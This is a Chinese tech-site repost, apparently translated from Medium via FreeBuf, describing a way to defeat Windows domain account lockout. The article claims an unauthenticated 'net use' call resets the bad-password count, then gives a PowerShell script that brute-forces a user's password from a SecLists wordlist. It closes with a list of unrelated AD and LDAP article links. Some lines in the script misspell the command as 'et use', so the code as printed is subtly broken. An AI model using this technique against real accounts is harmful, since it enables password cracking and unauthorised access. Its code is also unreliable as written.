android域账号认证失败,绕过域账户认证失败锁定次数限制的技巧
原标题:绕过域账户认证失败锁定次数限制的技巧
*本文仅用于教育目的。 切勿在未授权的计算机上进行安全测试。
获取用户帐户密码有很多好方法,这只是另一种方式。 好的,让我们开始吧。核心思路是,用户想要爆破身份验证,他们就可以运行“net use \\%computername%/ u:%username%”命令,该命令可以重新要求身份验证并重置锁定计数。要想进行操作,您需要从Microsoft下载远程服务器管理工具安装该工具后,运行一小段powershell脚本以显示我的JoeUser帐户信息并锁定。
get-aduser -filter * -prop lastbadpasswordattempt, badpwdcount, lockedout | select name, lastbadpasswordattempt, badpwdcount,lockedout | format-table -auto
在我的本地策略中,您可以看到我在3次无效登录尝试后被锁定(我从Microsoft获得的默认安装值)。
接下来我将输入错误的密码,window将记录我的错误次数。
现在我将使用命令清除错误的密码尝试:“Net use \\%computername%/ u:%username%”注意我没有指定密码。 我已经以用户身份登录,它似乎使用当前用户的上下文进行身份验证,并清除了错误的密码计数!
现在我可以使用这种技术爆破密码。 唯一的缺点是我必须在每次设置后删除共享。 例如,现在我已经进行了共享设置,如果我尝试爆破密码,我会收到此消息
然而只需一条命令即可“Net Use /Delete \\%computername%”
正式测试,我使用Daniel Miesslers SecLists的前10000名密码列表来爆破。正确的密码也在里面。
$userVar = Get-ChildItem env:username $uname = $userVar.Value $computerVar = Get-ChildItem env:computername $computerName = $computerVar.Value $ErrorActionPreference = "Stop" $hooray = "PasswordNotFoun" $CurrentPath = "C:\Users\Public" $FileName = "10-million-password-list-top-10000.txt" $FName= "$CurrentPath\$FileName" foreach($value in [System.IO.File]::ReadLines($Fname)) { $passAttempt = ('net use \\' + $computerName + ' "' + $value + '"' + '/u:' + $uname ) try { Write-Output ("trying password " + $value) $output = Invoke-Expression $passAttempt | Out-Null $hooray = $value write-output ("FOUND the user password: " + $value) $reset = ('et use \\' + $computername + ' /u:'+ $uname ) Invoke-Expression $reset | Out-Null $deleteShare = ('net use /delete \\' + $computername ) Invoke-Expression $deleteShare | Out-Null break } catch { $reset = ('et use \\' + $computername + '/u:' + $uname ) Invoke-Expression $reset | Out-Null $deleteShare = ('et use /delete \\'+ $computername ) Invoke-Expression $deleteShare | Out-Null } } write-host "The Password is: "$hooray
成功爆破
*参考来源:medium,FB小编周大涛编译,转载请注明来自FreeBuf.COM 返回搜狐,查看更多
责任编辑:
android域账号认证失败,绕过域账户认证失败锁定次数限制的技巧相关推荐
- 通过无线网登陆域服务器,Win10系统如何设置域账号连接企业内部域wifi
在Win10系统中,如果没有加入域的话,是不能自动以USER帐号连接企业内部域WIFI,那么我们可以经过一些设置来让域账号连接企业内部域wifi,下面给大家讲解一下具体的设置步骤. 1.首先,点击屏幕 ...
- win7系统添加wifi连接到服务器,手把手解决win7系统设置域账号连接企业内部域wifi的修复步骤...
许多win7系统用户在工作中经常需要对win7系统设置域账号连接企业内部域wifi进行设置,比如近日有用户到本站反映说win7系统设置域账号连接企业内部域wifi的问题,但是却不知道要怎么设置win7 ...
- IP-GUARD如何同步AD域账号(导入AD域功能使用说明)
导入AD域功能使用说明 若您的局域网中存在AD域组织结构,那么,通过AD域导入功能,您可以为AD域中未接入服务器的计算机和用户预先配置分组,当客户端接入服务器后,可自动分配到其所属分组中. 登陆AD域 ...
- 华润大学ldap账号是什么_认证配置 - 接入 LDAP / AD 域账号(Beta) - 《KubeSphere v2.1 使用手册》 - 书栈网 · BookStack...
接入 LDAP / AD 域账号(Beta) 如果您的企业使用 LDAP 作为用户认证系统,您可以在 KubeSphere 中通过脚本配置内置的 OpenLDAP 接入您的 LDAP 用户系统,从而允 ...
- Windows2008下安装域控DC及加域
本文章所示为VMware虚拟环境下安装: 一:安装阶段: 打开win2008虚拟机,更改计算机名称为"DC"后重启.设置一个固定IP,便于提供服务和管理: 2.打开"运行 ...
- AD域帐户密码过期,终端802.1x认证自动重连导致AD账号被锁,员工无法上网、办公怎么办?
搭建了微软 Active Directory(AD)或 OpenLDAP 的企业,通常会让员工使用 AD 域账号或OpenLDAP 账号密码登录电脑终端.OA.VPN.VDI或进行网络接入 802.1 ...
- AC 启用域服务器上网认证,突然出现密码认证失败,提示“用户未启用本地密码”
环境: SANGFOR AC-1000-B1200 V.13.0 AC13.0.62 旁挂模式部署 问题描述: AC 启用域服务器上网认证,突然出现密码认证失败,提示"用户未启用本地密码&q ...
- 使用Novell.Directory.Ldap.NETStandard在.NET Core中验证AD域账号
Novell.Directory.Ldap.NETStandard是一个在.NET Core中,既支持Windows平台,又支持Linux平台,进行Windows AD域操作的Nuget包. 首先我们 ...
- 域控制器与客户机之:域账号不能登录问题排查
经常会有人说自己的域账号不能登录域计算机 原因排查如下: 1.保证域账号存在且密码正确 a.域账号需在enable可用状态下,disabled的账号不能够登录 b.密码正确:检查密码是否过期,或者密码 ...
最新文章
- 江湖永在:金庸先生和阿里人的那些记忆
- php 检测密码,php检测密码强度
- 休眠自动提交命令强制MySQL在过多的磁盘I / O中运行
- Docker容器学习
- ffmpeg输出yuv的函数堆栈(h264)
- 小程序插件开发使用教程
- 深度学习----Tensorflow再命名实体上常用的函数
- js监听手机横竖屏事件
- 视频采集卡是什么?采集卡的妙用!
- 扫描仪扫描器的功用和原理
- 国际贸易术语解释通则(DEQ 目的港码头交货(……指定目的港))
- Parrot OS 4.6渗透测试系统安装与基础环境搭建
- 如何快速实现西门子S7-200/300 PLC转Modbus-TCP协议与第三方数据对接
- 一组Android机器人素材图片
- 计算机毕业设计SSM_旅游系统【附源码数据库】
- HashMap 的底层原理
- 改造Android手机为,便携式linux服务器,跑tomcat
- 【爬虫学习】Cookie-淘宝登录
- html语言加入图片背景音乐,如何插入背景音乐和背景图片(附HTML语法教程地址)...
- 子域名查询、DNS记录查询
热门文章
- SAP Spartacus CMSFlexComponent
- SAP Spartacus如何判断用户是否已经成功登录
- 如何使用Angular rxjs进行优雅限流
- How is note created - SAP backend implementation
- Angular groupBy test
- 一分钟开发一个hello world级别的wordpress插件
- attachment delete deletion commit work issue
- 列出系统所有未被Business transaction 引用的Products集合
- how is sap-ui-core.js initialize the reqeust of sap-ui-core-dbg.js
- 一个SAP顾问的回忆:我过去很胖!